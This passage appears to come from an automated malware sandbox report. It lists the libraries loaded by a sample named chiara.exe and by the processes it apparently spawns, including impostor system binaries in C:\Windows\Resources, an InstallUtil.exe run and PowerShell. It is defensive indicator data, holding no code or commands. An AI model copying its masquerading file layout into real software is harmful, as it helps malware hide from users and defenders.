Source: C:\Users\user\Desktop\chiara.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: twinui.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\chiara.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\icsys.icn.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Resources\svchost.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bthavctpsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wpprecorderum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: msvbvm60.dll
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: vb6zz.dll
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Resources\spoolsv.exe	Section loaded: sxs.dll
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: msvbvm60.dll
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: vb6zz.dll
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Resources\Themes\explorer.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntshrui.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cscapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\consent.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\consent.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\consent.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\consent.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\consent.exe	Section loaded: wmsgapi.dll
Source: C:\Windows\System32\consent.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\consent.exe	Section loaded: msctfmonitor.dll
Source: C:\Windows\System32\consent.exe	Section loaded: msimg32.dll
Source: C:\Windows\System32\consent.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\consent.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\consent.exe	Section loaded: msutb.dll
Source: C:\Windows\System32\consent.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\consent.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\consent.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\consent.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\consent.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\consent.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\consent.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\consent.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\consent.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\consent.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\consent.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\consent.exe	Section loaded: propsys.dll
Source: C:\Windows\Resources\svchost.exe	Section loaded: msvbvm60.dll
Source: C:\Windows\Resources\svchost.exe	Section loaded: vb6zz.dll
Source: C:\Windows\Resources\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Resources\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Resources\svchost.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
